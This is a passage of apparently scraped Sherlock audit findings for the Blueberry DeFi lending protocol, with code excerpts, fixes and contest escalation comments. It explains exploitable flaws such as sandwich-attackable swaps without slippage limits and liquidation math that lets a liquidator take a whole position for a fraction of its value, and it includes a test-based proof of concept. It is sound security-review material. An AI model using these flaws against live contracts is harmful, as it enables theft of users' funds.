uVaultShare = (pos.underlyingVaultShare * share) / oldShare;\\n\\npos.collateralSize -= liqSize;\\npos.underlyingAmount -= uTokenSize;\\npos.underlyingVaultShare -= uVaultShare;\\n```\\n\\nHowever, the liquidator doesn't receive those shares \"inside the system\". 
Instead, they receive the softVault tokens that can be claimed directly for the underlying asset by calling `withdraw()`, which simply redeems the underlying tokens from the Compound fork and sends them to the user.\\n```\\nfunction withdraw(uint256 shareAmount)\\n external\\n override\\n nonReentrant\\n returns (uint256 withdrawAmount)\\n{\\n if (shareAmount == 0) revert ZERO_AMOUNT();\\n\\n _burn(msg.sender, shareAmount);\\n\\n uint256 uBalanceBefore = uToken.balanceOf(address(this));\\n if (cToken.redeem(shareAmount) != 0) revert REDEEM_FAILED(shareAmount);\\n uint256 uBalanceAfter = uToken.balanceOf(address(this));\\n\\n withdrawAmount = uBalanceAfter - uBalanceBefore;\\n // Cut withdraw fee if it is in withdrawVaultFee Window (2 months)\\n if (\\n block.timestamp <\\n config.withdrawVaultFeeWindowStartTime() +\\n config.withdrawVaultFeeWindow()\\n ) {\\n uint256 fee = (withdrawAmount * config.withdrawVaultFee()) /\\n DENOMINATOR;\\n uToken.safeTransfer(config.treasury(), fee);\\n withdrawAmount -= fee;\\n }\\n uToken.safeTransfer(msg.sender, withdrawAmount);\\n\\n emit Withdrawn(msg.sender, withdrawAmount, shareAmount);\\n}\\n```\\n\\nNowhere in this process is `bank.totalLend` updated. As a result, each time there is a liquidation of size X, `bank.totalLend` will move X higher relative to the correct value. 
Slowly, over time, this value will begin to dramatically misrepresent the accurate amount that has been lent.\\nWhile there is no material exploit based on this inaccuracy at the moment, this is a core piece of data in the protocol, and it's inaccuracy could lead to major issues down the road.\\nFurthermore, it will impact immediate user behavior, as the Blueberry devs have explained \"we use that [value] to help us display TVL with subgraph\", which will deceive and confuse users.чIssue totalLend isn't updated on liquidation, leading to permanently inflated value\\nFor the best accuracy, updating `bank.totalLend` should happen from the `withdraw()` function in `SoftVault.sol` instead of from the core `BlueberryBank.sol` contract.\\nAlternatively, you could add an update to `bank.totalLend` in the `liquidate()` function, which might temporarily underrepresent the total lent before the liquidator withdrew the funds, but would end up being accurate over the long run.чA core metric of the protocol will be permanently inaccurate, giving users incorrect data to make their assessments on and potentially causing more severe issues down the road.ч```\\nbank.totalLend += amount;\\n```\\n -Complete debt size is not paid off for fee on transfer tokens, but users aren't warnedчmediumчThe protocol seems to be intentionally catering to fee on transfer tokens by measuring token balances before and after transfers to determine the value received. However, the mechanism to pay the full debt will not succeed in paying off the debt if it is used with a fee on transfer token.\\nThe protocol is clearly designed to ensure it is compatible with fee on transfer tokens. 
For example, all functions that receive tokens check the balance before and after, and calculate the difference between these values to measure tokens received:\\n```\\nfunction doERC20TransferIn(address token, uint256 amountCall)\\n internal\\n returns (uint256)\\n{\\n uint256 balanceBefore = IERC20Upgradeable(token).balanceOf(\\n address(this)\\n );\\n IERC20Upgradeable(token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amountCall\\n );\\n uint256 balanceAfter = IERC20Upgradeable(token).balanceOf(\\n address(this)\\n );\\n return balanceAfter - balanceBefore;\\n}\\n```\\n\\nThere is another feature of the protocol, which is that when loans are being repaid, the protocol gives the option of passing `type(uint256).max` to pay your debt in full:\\n```\\nif (amountCall == type(uint256).max) {\\n amountCall = oldDebt;\\n}\\n```\\n\\nHowever, these two features are not compatible. If a user paying off fee on transfer tokens passes in `type(uint256).max` to pay their debt in full, the full amount of their debt will be calculated. But when that amount is transferred to the contract, the amount that the result increases will be slightly less. As a result, the user will retain some balance that is not paid off.чI understand that it would be difficult to implement a mechanism to pay fee on transfer tokens off in full. That adds a lot of complexity that is somewhat fragile.\\nThe issue here is that the failure is silent, so that users request to pay off their loan in full, get confirmation, and may not realize that the loan still has an outstanding balance with interest accruing.\\nTo solve this, there should be a confirmation that any user who passes `type(uint256).max` has paid off their debt in full. 
Otherwise, the function should revert, so that users paying fee on transfer tokens know that they cannot use the \"pay in full\" feature and must specify the correct amount to get their outstanding balance down to zero.чThe feature to allow loans to be paid in full will silently fail when used with fee on transfer tokens, which may trick users into thinking they have completely paid off their loans, and accidentally maintaining a balance.ч```\\nfunction doERC20TransferIn(address token, uint256 amountCall)\\n internal\\n returns (uint256)\\n{\\n uint256 balanceBefore = IERC20Upgradeable(token).balanceOf(\\n address(this)\\n );\\n IERC20Upgradeable(token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amountCall\\n );\\n uint256 balanceAfter = IERC20Upgradeable(token).balanceOf(\\n address(this)\\n );\\n return balanceAfter - balanceBefore;\\n}\\n```\\n -HardVault never deposits assets to CompoundчmediumчWhile the protocol states that all underlying assets are deposited to their Compound fork to earn interest, it appears this action never happens in `HardVault.sol`.\\nThe documentation and comments seem to make clear that all assets deposited to `HardVault.sol` should be deposited to Compound to earn yield:\\n```\\n/**\\n * @notice Deposit underlying assets on Compound and issue share token\\n * @param amount Underlying token amount to deposit\\n * @return shareAmount cToken amount\\n */\\nfunction deposit(address token, uint256 amount) { // rest of code }\\n\\n/**\\n * @notice Withdraw underlying assets from Compound\\n * @param shareAmount Amount of cTokens to redeem\\n * @return withdrawAmount Amount of underlying assets withdrawn\\n */\\nfunction withdraw(address token, uint256 shareAmount) { // rest of code }\\n```\\n\\nHowever, if we examine the code in these functions, there is no movement of the assets to Compound. 
Instead, they sit in the Hard Vault and doesn't earn any yield.чEither add the functionality to the Hard Vault to have the assets pulled from the ERC1155 and deposited to the Compound fork, or change the comments and docs to be clear that such underlying assets will not be receiving any yield.чUsers who may expect to be earning yield on their underlying tokens will not be.ч```\\n/**\\n * @notice Deposit underlying assets on Compound and issue share token\\n * @param amount Underlying token amount to deposit\\n * @return shareAmount cToken amount\\n */\\nfunction deposit(address token, uint256 amount) { // rest of code }\\n\\n/**\\n * @notice Withdraw underlying assets from Compound\\n * @param shareAmount Amount of cTokens to redeem\\n * @return withdrawAmount Amount of underlying assets withdrawn\\n */\\nfunction withdraw(address token, uint256 shareAmount) { // rest of code }\\n```\\n -Withdrawals from IchiVaultSpell have no slippage protection so can be frontrun, stealing all user fundsчmediumчWhen a user withdraws their position through the `IchiVaultSpell`, part of the unwinding process is to trade one of the released tokens for the other, so the borrow can be returned. This trade is done on Uniswap V3. The parameters are set in such a way that there is no slippage protection, so any MEV bot could see this transaction, aggressively sandwich attack it, and steal the majority of the user's funds.\\nUsers who have used the `IchiVaultSpell` to take positions in Ichi will eventually choose to withdraw their funds. 
They can do this by calling `closePosition()` or `closePositionFarm()`, both of which call to `withdrawInternal()`, which follows loosely the following logic:\\nsends the LP tokens back to the Ichi vault for the two underlying tokens (one of which was what was borrowed)\\nswaps the non-borrowed token for the borrowed token on UniV3, to ensure we will be able to pay the loan back\\nwithdraw our underlying token from the Compound fork\\nrepay the borrow token loan to the Compound fork\\nvalidate that we are still under the maxLTV for our strategy\\nsend the funds (borrow token and underlying token) back to the user\\nThe issue exists in the swap, where Uniswap is called with the following function:\\n```\\nif (amountToSwap > 0) {\\n swapPool = IUniswapV3Pool(vault.pool());\\n swapPool.swap(\\n address(this),\\n !isTokenA,\\n int256(amountToSwap),\\n isTokenA\\n ? UniV3WrappedLibMockup.MAX_SQRT_RATIO - 1 \\n : UniV3WrappedLibMockup.MIN_SQRT_RATIO + 1, \\n abi.encode(address(this))\\n );\\n}\\n```\\n\\nThe 4th variable is called `sqrtPriceLimitX96` and it represents the square root of the lowest or highest price that you are willing to perform the trade at. In this case, we've hardcoded in that we are willing to take the worst possible rate (highest price in the event we are trading 1 => 0; lowest price in the event we are trading 0 => 1).\\nThe `IchiVaultSpell.sol#uniswapV3SwapCallback()` function doesn't enforce any additional checks. 
It simply sends whatever delta is requested directly to Uniswap.\\n```\\nfunction uniswapV3SwapCallback(\\n int256 amount0Delta,\\n int256 amount1Delta,\\n bytes calldata data\\n) external override {\\n if (msg.sender != address(swapPool)) revert NOT_FROM_UNIV3(msg.sender);\\n address payer = abi.decode(data, (address));\\n\\n if (amount0Delta > 0) {\\n if (payer == address(this)) {\\n IERC20Upgradeable(swapPool.token0()).safeTransfer(\\n msg.sender,\\n uint256(amount0Delta)\\n );\\n } else {\\n IERC20Upgradeable(swapPool.token0()).safeTransferFrom(\\n payer,\\n msg.sender,\\n uint256(amount0Delta)\\n );\\n }\\n } else if (amount1Delta > 0) {\\n if (payer == address(this)) {\\n IERC20Upgradeable(swapPool.token1()).safeTransfer(\\n msg.sender,\\n uint256(amount1Delta)\\n );\\n } else {\\n IERC20Upgradeable(swapPool.token1()).safeTransferFrom(\\n payer,\\n msg.sender,\\n uint256(amount1Delta)\\n );\\n }\\n }\\n}\\n```\\n\\nWhile it is true that there is an `amountRepay` parameter that is inputted by the user, it is not sufficient to protect users. Many users will want to make only a small repayment (or no repayment) while unwinding their position, and thus this variable will only act as slippage protection in the cases where users intend to repay all of their returned funds.\\nWith this knowledge, a malicious MEV bot could watch for these transactions in the mempool. 
When it sees such a transaction, it could perform a \"sandwich attack\", trading massively in the same direction as the trade in advance of it to push the price out of whack, and then trading back after us, so that they end up pocketing a profit at our expense.чHave the user input a slippage parameter to ensure that the amount of borrowed token they receive back from Uniswap is in line with what they expect.\\nAlternatively, use the existing oracle system to estimate a fair price and use that value in the `swap()` call.чUsers withdrawing their funds through the `IchiVaultSpell` who do not plan to repay all of the tokens returned from Uniswap could be sandwich attacked, losing their funds by receiving very little of their borrowed token back from the swap.ч```\\nif (amountToSwap > 0) {\\n swapPool = IUniswapV3Pool(vault.pool());\\n swapPool.swap(\\n address(this),\\n !isTokenA,\\n int256(amountToSwap),\\n isTokenA\\n ? UniV3WrappedLibMockup.MAX_SQRT_RATIO - 1 \\n : UniV3WrappedLibMockup.MIN_SQRT_RATIO + 1, \\n abi.encode(address(this))\\n );\\n}\\n```\\n -BasicSpell.doCutRewardsFee uses depositFee instead of withdraw feeчmediumчBasicSpell.doCutRewardsFee uses depositFee instead of withdraw fee\\n```\\n function doCutRewardsFee(address token) internal {\\n if (bank.config().treasury() == address(0)) revert NO_TREASURY_SET();\\n\\n\\n uint256 balance = IERC20Upgradeable(token).balanceOf(address(this));\\n if (balance > 0) {\\n uint256 fee = (balance * bank.config().depositFee()) / DENOMINATOR;\\n IERC20Upgradeable(token).safeTransfer(\\n bank.config().treasury(),\\n fee\\n );\\n\\n\\n balance -= fee;\\n IERC20Upgradeable(token).safeTransfer(bank.EXECUTOR(), balance);\\n }\\n }\\n```\\n\\nThis function is called in order to get fee from ICHI rewards, collected by farming. 
But currently it takes `bank.config().depositFee()` instead of `bank.config().withdrawFee()`.чIssue BasicSpell.doCutRewardsFee uses depositFee instead of withdraw fee\\nTake withdraw fee from rewards.чWrong fee amount is taken.ч```\\n function doCutRewardsFee(address token) internal {\\n if (bank.config().treasury() == address(0)) revert NO_TREASURY_SET();\\n\\n\\n uint256 balance = IERC20Upgradeable(token).balanceOf(address(this));\\n if (balance > 0) {\\n uint256 fee = (balance * bank.config().depositFee()) / DENOMINATOR;\\n IERC20Upgradeable(token).safeTransfer(\\n bank.config().treasury(),\\n fee\\n );\\n\\n\\n balance -= fee;\\n IERC20Upgradeable(token).safeTransfer(bank.EXECUTOR(), balance);\\n }\\n }\\n```\\n -ChainlinkAdapterOracle will return the wrong price for asset if underlying aggregator hits minAnswerчmediumчChainlink aggregators have a built in circuit breaker if the price of an asset goes outside of a predetermined price band. The result is that if an asset experiences a huge drop in value (i.e. LUNA crash) the price of the oracle will continue to return the minPrice instead of the actual price of the asset. This would allow user to continue borrowing with the asset but at the wrong price. 
This is exactly what happened to Venus on BSC when LUNA imploded.\\nChainlinkAdapterOracle uses the ChainlinkFeedRegistry to obtain the price of the requested tokens.\\n```\\nfunction latestRoundData(\\n address base,\\n address quote\\n)\\n external\\n view\\n override\\n checkPairAccess()\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n{\\n uint16 currentPhaseId = s_currentPhaseId[base][quote];\\n //@audit this pulls the Aggregator for the requested pair\\n AggregatorV2V3Interface aggregator = _getFeed(base, quote);\\n require(address(aggregator) != address(0), \"Feed not found\");\\n (\\n roundId,\\n answer,\\n startedAt,\\n updatedAt,\\n answeredInRound\\n ) = aggregator.latestRoundData();\\n return _addPhaseIds(roundId, answer, startedAt, updatedAt, answeredInRound, currentPhaseId);\\n}\\n```\\n\\nChainlinkFeedRegistry#latestRoundData pulls the associated aggregator and requests round data from it. ChainlinkAggregators have minPrice and maxPrice circuit breakers built into them. This means that if the price of the asset drops below the minPrice, the protocol will continue to value the token at minPrice instead of it's actual value. This will allow users to take out huge amounts of bad debt and bankrupt the protocol.\\nExample: TokenA has a minPrice of $1. The price of TokenA drops to $0.10. The aggregator still returns $1 allowing the user to borrow against TokenA as if it is $1 which is 10x it's actual value.\\nNote: Chainlink oracles are used a just one piece of the OracleAggregator system and it is assumed that using a combination of other oracles, a scenario like this can be avoided. However this is not the case because the other oracles also have their flaws that can still allow this to be exploited. As an example if the chainlink oracle is being used with a UniswapV3Oracle which uses a long TWAP then this will be exploitable when the TWAP is near the minPrice on the way down. 
In a scenario like that it wouldn't matter what the third oracle was because it would be bypassed with the two matching oracles prices. If secondary oracles like Band are used a malicious user could DDOS relayers to prevent update pricing. Once the price becomes stale the chainlink oracle would be the only oracle left and it's price would be used.чIssue ChainlinkAdapterOracle will return the wrong price for asset if underlying aggregator hits minAnswer\\nChainlinkAdapterOracle should check the returned answer against the minPrice/maxPrice and revert if the answer is outside of the bounds:\\n```\\n (, int256 answer, , uint256 updatedAt, ) = registry.latestRoundData(\\n token,\\n USD\\n );\\n \\n+ if (answer >= maxPrice or answer <= minPrice) revert();\\n```\\nчIn the event that an asset crashes (i.e. LUNA) the protocol can be manipulated to give out loans at an inflated priceч```\\nfunction latestRoundData(\\n address base,\\n address quote\\n)\\n external\\n view\\n override\\n checkPairAccess()\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n{\\n uint16 currentPhaseId = s_currentPhaseId[base][quote];\\n //@audit this pulls the Aggregator for the requested pair\\n AggregatorV2V3Interface aggregator = _getFeed(base, quote);\\n require(address(aggregator) != address(0), \"Feed not found\");\\n (\\n roundId,\\n answer,\\n startedAt,\\n updatedAt,\\n answeredInRound\\n ) = aggregator.latestRoundData();\\n return _addPhaseIds(roundId, answer, startedAt, updatedAt, answeredInRound, currentPhaseId);\\n}\\n```\\n -WIchiFarm will break after second deposit of LPчmediumчWIchiFarm.sol makes the incorrect assumption that IchiVaultLP doesn't reduce allowance when using the transferFrom if allowance is set to type(uint256).max. Looking at a currently deployed IchiVault this assumption is not true. 
On the second deposit for the LP token, the call will always revert at the safe approve call.\nIchiVault\n```\n function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {\n _transfer(sender, recipient, amount);\n _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, \"ERC20: transfer amount exceeds allowance\"));\n return true;\n }\n```\n\nThe above lines show the transferFrom call which reduces the allowance of the spender regardless of whether the spender is approved for type(uint256).max or not.\n```\n if (\n IERC20Upgradeable(lpToken).allowance(\n address(this),\n address(ichiFarm)\n ) != type(uint256).max\n ) {\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\n IERC20Upgradeable(lpToken).safeApprove(\n address(ichiFarm),\n type(uint256).max\n );\n }\n```\n\nAs a result after the first deposit the allowance will be less than type(uint256).max. When there is a second deposit, the reduced allowance will trigger a safeApprove call.\n```\nfunction safeApprove(\n IERC20Upgradeable token,\n address spender,\n uint256 value\n) internal {\n // safeApprove should only be called when setting an initial allowance,\n // or when resetting it to zero. To increase and decrease it, use\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\n require(\n (value == 0) || (token.allowance(address(this), spender) == 0),\n \"SafeERC20: approve from non-zero to non-zero allowance\"\n );\n _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));\n}\n```\n\nsafeApprove requires that either the input is zero or the current allowance is zero. Since neither is true the call will revert. The result of this is that WIchiFarm is effectively broken after the first deposit.чOnly approve if current allowance isn't enough for call. Optionally add zero approval before the approve. 
Realistically it's impossible to use the entire type(uint256).max, but to cover edge cases you may want to add it.\\n```\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n- ) != type(uint256).max\\n+ ) < amount\\n ) {\\n\\n+ IERC20Upgradeable(lpToken).safeApprove(\\n+ address(ichiFarm),\\n+ 0\\n );\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n```\\nчWIchiFarm is broken and won't be able to process deposits after the first.ч```\\n function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {\\n _transfer(sender, recipient, amount);\\n _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, \"ERC20: transfer amount exceeds allowance\"));\\n return true;\\n }\\n```\\n -Liquidator can take all collateral and underlying tokens for a fraction of the correct priceчhighчWhen performing liquidation calculations, we use the proportion of the individual token's debt they pay off to calculate the proportion of the liquidated user's collateral and underlying tokens to send to them. In the event that the user has multiple types of debt, the liquidator will be dramatically overpaid.\\nWhen a position's risk rating falls below the underlying token's liquidation threshold, the position becomes liquidatable. 
At this point, anyone can call `liquidate()` and pay back a share of their debt, and receive a proportionate share of their underlying assets.\nThis is calculated as follows:\n```\nuint256 oldShare = pos.debtShareOf[debtToken];\n(uint256 amountPaid, uint256 share) = repayInternal(\n positionId,\n debtToken,\n amountCall\n);\n\nuint256 liqSize = (pos.collateralSize * share) / oldShare;\nuint256 uTokenSize = (pos.underlyingAmount * share) / oldShare;\nuint256 uVaultShare = (pos.underlyingVaultShare * share) / oldShare;\n\npos.collateralSize -= liqSize;\npos.underlyingAmount -= uTokenSize;\npos.underlyingVaultShare -= uVaultShare;\n\n// // rest of codetransfer liqSize wrapped LP Tokens and uVaultShare underlying vault shares to the liquidator\n}\n```\n\nTo summarize:\nThe liquidator inputs a debtToken to pay off and an amount to pay\nWe check the amount of debt shares the position has on that debtToken\nWe call `repayInternal()`, which pays off the position and returns the amount paid and number of shares paid off\nWe then calculate the proportion of collateral and underlying tokens to give the liquidator\nWe adjust the liquidated position's balances, and send the funds to the liquidator\nThe problem comes in the calculations. The amount paid to the liquidator is calculated as:\n```\nuint256 liqSize = (pos.collateralSize * share) / oldShare\nuint256 uTokenSize = (pos.underlyingAmount * share) / oldShare;\nuint256 uVaultShare = (pos.underlyingVaultShare * share) / oldShare;\n```\n\nThese calculations are taking the total size of the collateral or underlying token. They are then multiplying it by `share / oldShare`. 
But `share / oldShare` is just the proportion of that one type of debt that was paid off, not of the user's entire debt pool.\nLet's walk through a specific scenario of how this might be exploited:\nUser deposits 1mm DAI (underlying) and uses it to borrow $950k of ETH and $50k worth of ICHI (11.8k ICHI)\nBoth assets are deposited into the ETH-ICHI pool, yielding the same collateral token\nBoth prices crash down by 25% so the position is now liquidatable (worth $750k)\nA liquidator pays back the full ICHI position, and the calculations above yield `pos.collateralSize * 11.8k / 11.8k` (same calculation for the other two formulas)\nThe result is that for 11.8k ICHI (worth $37.5k after the price crash), the liquidator got all the DAI (value $1mm) and LP tokens (value $750k)чIssue Liquidator can take all collateral and underlying tokens for a fraction of the correct price\nAdjust these calculations to use `amountPaid / getDebtValue(positionId)`, which will accurately calculate the proportion of the total debt paid off.чIf a position with multiple borrows goes into liquidation, the liquidator can pay off the smallest token (guaranteed to be less than half the total value) to take the full position, stealing funds from innocent users.ч```\nuint256 oldShare = pos.debtShareOf[debtToken];\n(uint256 amountPaid, uint256 share) = repayInternal(\n positionId,\n debtToken,\n amountCall\n);\n\nuint256 liqSize = (pos.collateralSize * share) / oldShare;\nuint256 uTokenSize = (pos.underlyingAmount * share) / oldShare;\nuint256 uVaultShare = (pos.underlyingVaultShare * share) / oldShare;\n\npos.collateralSize -= liqSize;\npos.underlyingAmount -= uTokenSize;\npos.underlyingVaultShare -= uVaultShare;\n\n// // rest of codetransfer liqSize wrapped LP Tokens and uVaultShare underlying vault shares to the liquidator\n}\n```\n -The maximum size of an `ICHI` vault spell position can be arbitrarily surpassedчmediumчThe maximum size of an `ICHI` vault spell position can 
be arbitrarily surpassed by subsequent deposits to a position due to a flaw in the `curPosSize` calculation.\\nIchi vault spell positions are subject to a maximum size limit to prevent large positions, ensuring a wide margin for liquidators and bad debt prevention for the protocol.\\nThe maximum position size is enforced in the `IchiVaultSpell.depositInternal` function and compared to the current position size `curPosSize`.\\nHowever, the `curPosSize` does not reflect the actual position size, but the amount of Ichi vault LP tokens that are currently held in the `IchiVaultSpell` contract (see L153).\\nAssets can be repeatedly deposited into an Ichi vault spell position using the `IchiVaultSpell.openPosition` function (via the `BlueBerryBank.execute` function).\\nOn the very first deposit, the `curPosSize` correctly reflects the position size. However, on subsequent deposits, the previously received Ichi `vault` LP tokens are kept in the `BlueBerryBank` contract. Thus, checking the balance of `vault` tokens in the `IchiVaultSpell` contract only accounts for the current deposit.\\nTest case\\nTo demonstrate this issue, please use the following test case:\\n```\\ndiff --git a/test/spell/ichivault.spell.test.ts b/test/spell/ichivault.spell.test.ts\\nindex 258d653..551a6eb 100644\\n--- a/test/spell/ichivault.spell.test.ts\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/spell/ichivault.spell.test.ts\\n@@ -163,6 // Add the line below\\n163,26 @@ describe('ICHI Angel Vaults Spell', () => {\\n afterTreasuryBalance.sub(beforeTreasuryBalance)\\n ).to.be.equal(depositAmount.mul(50).div(10000))\\n })\\n// Add the line below\\n it(\"should revert when exceeds max pos size due to increasing position\", async () => {\\n// Add the line below\\n await ichi.approve(bank.address, ethers.constants.MaxUint256);\\n// Add the line below\\n await bank.execute(\\n// Add the line below\\n 0,\\n// Add the line below\\n spell.address,\\n// Add the line 
below\\n iface.encodeFunctionData(\"openPosition\", [\\n// Add the line below\\n 0, ICHI, USDC, depositAmount.mul(4), borrowAmount.mul(6) // Borrow 1.800e6 USDC\\n// Add the line below\\n ])\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n await expect(\\n// Add the line below\\n bank.execute(\\n// Add the line below\\n 0,\\n// Add the line below\\n spell.address,\\n// Add the line below\\n iface.encodeFunctionData(\"openPosition\", [\\n// Add the line below\\n 0, ICHI, USDC, depositAmount.mul(1), borrowAmount.mul(2) // Borrow 300e6 USDC\\n// Add the line below\\n ])\\n// Add the line below\\n )\\n// Add the line below\\n ).to.be.revertedWith(\"EXCEED_MAX_POS_SIZE\"); // 1_800e6 // Add the line below\\n 300e6 = 2_100e6 > 2_000e6 strategy max position size limit\\n// Add the line below\\n })\\n it(\"should be able to return position risk ratio\", async () => {\\n let risk = await bank.getPositionRisk(1);\\n console.log('Prev Position Risk', utils.formatUnits(risk, 2), '%');\\n```\\n\\nRun the test with the following command:\\n```\\nyarn hardhat test --grep \"should revert when exceeds max pos size due to increasing position\"\\n```\\n\\nThe test case fails and therefore shows that the maximum position size can be exceeded without reverting.чConsider determining the current position size using the `bank.getPositionValue()` function instead of using the current Ichi vault LP token balance.чThe maximum position size limit can be exceeded, leading to potential issues with liquidations and bad debt accumulation.ч```\\ndiff --git a/test/spell/ichivault.spell.test.ts b/test/spell/ichivault.spell.test.ts\\nindex 258d653..551a6eb 100644\\n--- a/test/spell/ichivault.spell.test.ts\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/spell/ichivault.spell.test.ts\\n@@ -163,6 // Add the line below\\n163,26 @@ describe('ICHI Angel Vaults Spell', () => {\\n afterTreasuryBalance.sub(beforeTreasuryBalance)\\n 
).to.be.equal(depositAmount.mul(50).div(10000))\\n })\\n// Add the line below\\n it(\"should revert when exceeds max pos size due to increasing position\", async () => {\\n// Add the line below\\n await ichi.approve(bank.address, ethers.constants.MaxUint256);\\n// Add the line below\\n await bank.execute(\\n// Add the line below\\n 0,\\n// Add the line below\\n spell.address,\\n// Add the line below\\n iface.encodeFunctionData(\"openPosition\", [\\n// Add the line below\\n 0, ICHI, USDC, depositAmount.mul(4), borrowAmount.mul(6) // Borrow 1.800e6 USDC\\n// Add the line below\\n ])\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n await expect(\\n// Add the line below\\n bank.execute(\\n// Add the line below\\n 0,\\n// Add the line below\\n spell.address,\\n// Add the line below\\n iface.encodeFunctionData(\"openPosition\", [\\n// Add the line below\\n 0, ICHI, USDC, depositAmount.mul(1), borrowAmount.mul(2) // Borrow 300e6 USDC\\n// Add the line below\\n ])\\n// Add the line below\\n )\\n// Add the line below\\n ).to.be.revertedWith(\"EXCEED_MAX_POS_SIZE\"); // 1_800e6 // Add the line below\\n 300e6 = 2_100e6 > 2_000e6 strategy max position size limit\\n// Add the line below\\n })\\n it(\"should be able to return position risk ratio\", async () => {\\n let risk = await bank.getPositionRisk(1);\\n console.log('Prev Position Risk', utils.formatUnits(risk, 2), '%');\\n```\\n -LP tokens cannot be valued because ICHI cannot be priced by oracle, causing all new open positions to revertчmediumчIn order to value ICHI LP tokens, the oracle uses the Fair LP Pricing technique, which uses the prices of both individual tokens, along with the quantities, to calculate the LP token value. However, this process requires the underlying token prices to be accessible by the oracle. 
Both Chainlink and Band do not support the ICHI token, so the function will fail, causing all new positions using the IchiVaultSpell to revert.\\nWhen a new Ichi position is opened, the ICHI LP tokens are posted as collateral. Their value is assessed using the `IchiLpOracle#getPrice()` function:\\n```\\nfunction getPrice(address token) external view override returns (uint256) {\\n IICHIVault vault = IICHIVault(token);\\n uint256 totalSupply = vault.totalSupply();\\n if (totalSupply == 0) return 0;\\n\\n address token0 = vault.token0();\\n address token1 = vault.token1();\\n\\n (uint256 r0, uint256 r1) = vault.getTotalAmounts();\\n uint256 px0 = base.getPrice(address(token0));\\n uint256 px1 = base.getPrice(address(token1));\\n uint256 t0Decimal = IERC20Metadata(token0).decimals();\\n uint256 t1Decimal = IERC20Metadata(token1).decimals();\\n\\n uint256 totalReserve = (r0 * px0) /\\n 10**t0Decimal +\\n (r1 * px1) /\\n 10**t1Decimal;\\n\\n return (totalReserve * 1e18) / totalSupply;\\n}\\n```\\n\\nThis function uses the \"Fair LP Pricing\" formula, made famous by Alpha Homora. To simplify, this uses an oracle to get the prices of both underlying tokens, and then calculates the LP price based on these values and the reserves.\\nHowever, this process requires that we have a functioning oracle for the underlying tokens. However, Chainlink and Band both do not support the ICHI token (see the links for their comprehensive lists of data feeds). As a result, the call to `base.getPrice(token0)` will fail.\\nAll prices are calculated in the `isLiquidatable()` check at the end of the `execute()` function. As a result, any attempt to open a new ICHI position and post the LP tokens as collateral (which happens in both `openPosition()` and openPositionFarm()) will revert.чThere will need to be an alternate form of oracle that can price the ICHI token. 
The best way to accomplish this is likely to use a TWAP of the price on an AMM.чAll new positions opened using the `IchiVaultSpell` will revert when they attempt to look up the LP token price, rendering the protocol useless.\\nThis vulnerability would result in a material loss of funds and the cost of the attack is low (relative to the amount of funds lost). The attack path is possible with reasonable assumptions that mimic on-chain conditions. The vulnerability must be something that is not considered an acceptable risk by a reasonable protocol team.\\nsherlock-admin\\nEscalate for 31 USDC\\nImpact stated is medium, since positions cannot be opened and no funds are at risk. The high severity definition as stated per Sherlock docs:\\nThis vulnerability would result in a material loss of funds and the cost of the attack is low (relative to the amount of funds lost). The attack path is possible with reasonable assumptions that mimic on-chain conditions. The vulnerability must be something that is not considered an acceptable risk by a reasonable protocol team.\\nYou've created a valid escalation for 31 USDC!\\nTo remove the escalation from consideration: Delete your comment. To change the amount you've staked on this escalation: Edit your comment (do not create a new comment).\\nYou may delete or edit your escalation comment anytime before the 48-hour escalation window closes. 
After that, the escalation becomes final.\\nhrishibhat\\nEscalation accepted\\nThis is a valid medium Also Given that this is an issue only for the Ichi tokens and impact is only unable to open positions.\\nsherlock-admin\\nEscalation accepted\\nThis is a valid medium Also Given that this is an issue only for the Ichi tokens and impact is only unable to open positions.\\nThis issue's escalations have been accepted!\\nContestants' payouts and scores will be updated according to the changes made on this issue.ч```\\nfunction getPrice(address token) external view override returns (uint256) {\\n IICHIVault vault = IICHIVault(token);\\n uint256 totalSupply = vault.totalSupply();\\n if (totalSupply == 0) return 0;\\n\\n address token0 = vault.token0();\\n address token1 = vault.token1();\\n\\n (uint256 r0, uint256 r1) = vault.getTotalAmounts();\\n uint256 px0 = base.getPrice(address(token0));\\n uint256 px1 = base.getPrice(address(token1));\\n uint256 t0Decimal = IERC20Metadata(token0).decimals();\\n uint256 t1Decimal = IERC20Metadata(token1).decimals();\\n\\n uint256 totalReserve = (r0 * px0) /\\n 10**t0Decimal +\\n (r1 * px1) /\\n 10**t1Decimal;\\n\\n return (totalReserve * 1e18) / totalSupply;\\n}\\n```\\n -onlyEOAEx modifier that ensures call is from EOA might not hold true in the futureчmediumчmodifier `onlyEOAEx` is used to ensure calls are only made from EOA. However, EIP 3074 suggests that using `onlyEOAEx` modifier to ensure calls are only from EOA might not hold true.\\nFor `onlyEOAEx`, `tx.origin` is used to ensure that the caller is from an EOA and not a smart contract.\\n```\\n modifier onlyEOAEx() {\\n if (!allowContractCalls && !whitelistedContracts[msg.sender]) {\\n if (msg.sender != tx.origin) revert NOT_EOA(msg.sender);\\n }\\n _;\\n }\\n```\\n\\nHowever, according to EIP 3074,\\nThis EIP introduces two EVM instructions AUTH and AUTHCALL. The first sets a context variable authorized based on an ECDSA signature. 
